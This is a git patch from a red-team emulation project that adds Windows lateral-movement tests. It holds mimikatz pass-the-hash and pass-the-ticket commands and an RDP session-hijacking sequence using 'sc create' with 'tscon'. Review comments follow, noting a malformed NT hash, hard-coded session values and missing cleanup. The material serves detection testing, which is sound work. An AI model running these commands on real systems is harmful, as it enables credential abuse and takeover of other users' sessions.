From 0bfdcfa480409ae0c17b29bd61fc1cabdecdb479 Mon Sep 17 00:00:00 2001 From: Michael Haag <“mike@redcanary.com git config --global user.name “Michael Haag> Date: Fri, 6 Apr 2018 08:21:28 -0400 Subject: [PATCH] Lateral Movement + PtH + RDP --- Windows/Lateral_Movement/Pass_the_Hash.md | 15 +++++++++++++++ .../Remote_Desktop_Protocol.md | 18 ++++++++++++++++++ Windows/README.md | 4 ++-- 3 files changed, 35 insertions(+), 2 deletions(-) create mode 100644 Windows/Lateral_Movement/Pass_the_Hash.md create mode 100644 Windows/Lateral_Movement/Remote_Desktop_Protocol.md diff --git a/Windows/Lateral_Movement/Pass_the_Hash.md b/Windows/Lateral_Movement/Pass_the_Hash.md new file mode 100644 index 00000000..743754ec --- /dev/null +++ b/Windows/Lateral_Movement/Pass_the_Hash.md @@ -0,0 +1,15 @@ +## Pass the Hash + +MITRE ATT&CK Technique: [T1075](https://attack.mitre.org/wiki/Technique/T1075) + +#### Mimikatz + +Note: must dump hashes first + +`mimikatz # sekurlsa::pth /user:Administrator /domain:atomic.local /ntlm:cc36cf7a8514893efccd3324464tkg1a` + +[Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth) + +#### Kerberos Ticket attack + +`mimikatz # kerberos::ptt Administrator@krbtgt-atomic.LOCAL.kirbi` diff --git a/Windows/Lateral_Movement/Remote_Desktop_Protocol.md b/Windows/Lateral_Movement/Remote_Desktop_Protocol.md new file mode 100644 index 00000000..7c1a4fa0 --- /dev/null +++ b/Windows/Lateral_Movement/Remote_Desktop_Protocol.md 
@@ -0,0 +1,18 @@ +## Remote Desktop Protocol + +MITRE ATT&CK Technique: [T1076](https://attack.mitre.org/wiki/Technique/T1076) + + +#### [RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) — how to hijack RDS and RemoteApp sessions transparently to move through an organization + +retrieve the session ID: + + query user + +Set the session ID and rdp-tcp# retrieved from `query user` + + sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55" + +Access the session: + + net start sesshijack diff --git a/Windows/README.md b/Windows/README.md index 4b49bc23..67eb9c20 100644 --- a/Windows/README.md +++ b/Windows/README.md 
@@ -6,9 +6,9 @@ | AppCert DLLs | Accessibility Features | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Distributed Component Object Model | [Dynamic Data Exchange](Execution/Dynamic_Data_Exchange.md) | [Automated Collection](Collection/Automated_Collection.md) | [Data Compressed](Exfiltration/Data_Compressed.md) | Communication Through Removable Media | | [AppInit DLLs](Persistence/AppInit_DLLs.md) | AppCert DLLs | Bypass User Account Control | [Credential Dumping](Credential_Access/Credential_Dumping.md) | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Execution through API | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy | | [Application Shimming](Persistence/Application_Shimming.md) | AppInit DLLs | Code Signing | [Credentials in Files](Credential_Access/Credentials_in_Files.md) | Network Service Scanning | [Logon Scripts](Persistence/Logon_Scripts.md) | Execution through Module Load | [Clipboard Data](Collection/Clipboard_Data.md) | Data Transfer Size Limits | Custom Command and Control Protocol | -| [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | Exploitation of Vulnerability | Network Share Discovery | Pass the Hash | Graphical User Interface | [Data Staged](Collection/Data_Staged.md) | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | +| [Authentication Package](Persistence/Authentication_Package.md) | Application Shimming | Component Firmware | Exploitation of Vulnerability | Network Share Discovery | [Pass the Hash](Lateral_Movement/Pass_the_Hash.md) | Graphical User Interface | [Data Staged](Collection/Data_Staged.md) | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | | Bootkit | [Bypass User Account Control](Privilege_Escalation/Bypass_User_Account_Control.md) | Component Object Model 
Hijacking | Forced Authentication | Peripheral Device Discovery | Pass the Ticket | [InstallUtil](Execution/InstallUtil.md) | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding | -| [Browser Extensions](Persistence/Browser_Extensions.md) | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | Remote Desktop Protocol | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | +| [Browser Extensions](Persistence/Browser_Extensions.md) | DLL Search Order Hijacking | DLL Search Order Hijacking | Hooking | Permission Groups Discovery | [Remote Desktop Protocol](Lateral_Movement/Remote_Desktop_Protocol.md) | LSASS Driver | Data from Network Shared Drive | Exfiltration Over Other Network Medium | Data Obfuscation | | [Change Default File Association](Persistence/Change_Default_File_Association.md) | Exploitation of Vulnerability | DLL Side-Loading | [Input Capture](Collection/Input_Capture.md) | Process Discovery | Remote File Copy | [Mshta](Execution/Mshta.md) | Data from Removable Media | Exfiltration Over Physical Medium | Domain Fronting | | Component Firmware | Extra Window Memory Injection | [Deobfuscate/Decode Files or Information](Defense_Evasion/Deobfuscate_Decode_Files_Or_Information.md) | LLMNR/NBT-NS Poisoning | [Query Registry](Discovery/Query_Registry.md) | Remote Services | [PowerShell](Execution/PowerShell.md) | Email Collection | Scheduled Transfer | Fallback Channels | | [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File System Permissions Weakness | [Disabling Security Tools](Defense_Evasion/Disabling_Security_Tools.md) | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels |
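Review bot: the `/ntlm:` value in the `sekurlsa::pth` line of Pass_the_Hash.md, `cc36cf7a8514893efccd3324464tkg1a`, is not a usable NT hash (an NT hash is 32 hexadecimal characters; this string contains `t`, `k` and `g`), so a reader who copies the test as written cannot reproduce it; replace it with an explicit placeholder such as `/ntlm:<NT_HASH_FROM_CREDENTIAL_DUMP>` and turn the "Note: must dump hashes first" line into a link to the existing `Credential_Access/Credential_Dumping.md` page so the prerequisite is actionable. Separately, the `#### Kerberos Ticket attack` section (`kerberos::ptt Administrator@krbtgt-atomic.LOCAL.kirbi`) describes Pass the Ticket, which the README in this same patch tracks as its own technique cell, so it belongs in its own file rather than under the T1075 heading.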
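Review bot: in Remote_Desktop_Protocol.md the line `sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"` hard-codes `1` and `rdp-tcp#55` although the sentence before it says both values are taken from `query user`; show them as placeholders (for example `<session_id>` and `<session_name>`) and say which `query user` column supplies each, otherwise the test only works on the machine it was written on. The test also has no cleanup step: `net start sesshijack` leaves a `sesshijack` service registered, so add `sc delete sesshijack` at the end and state that `sc create` requires administrative rights, since that is also the artifact (a new service whose image path contains `tscon`) a detection engineer running this test should expect to see. Minor: this file uses indented code blocks while Pass_the_Hash.md uses backtick code spans; the two new files should use one convention.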
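Review bot: the README hunk links the "Pass the Hash" and "Remote Desktop Protocol" cells to the new files, but the "Pass the Ticket" cell in the unchanged `| Bootkit |` row stays plain text even though this patch adds `kerberos::ptt` content (the "Kerberos Ticket attack" section of Pass_the_Hash.md); either link that cell to wherever the Pass the Ticket material ends up or drop the section from Pass_the_Hash.md, so the README index and the per-technique files agree on which techniques are covered.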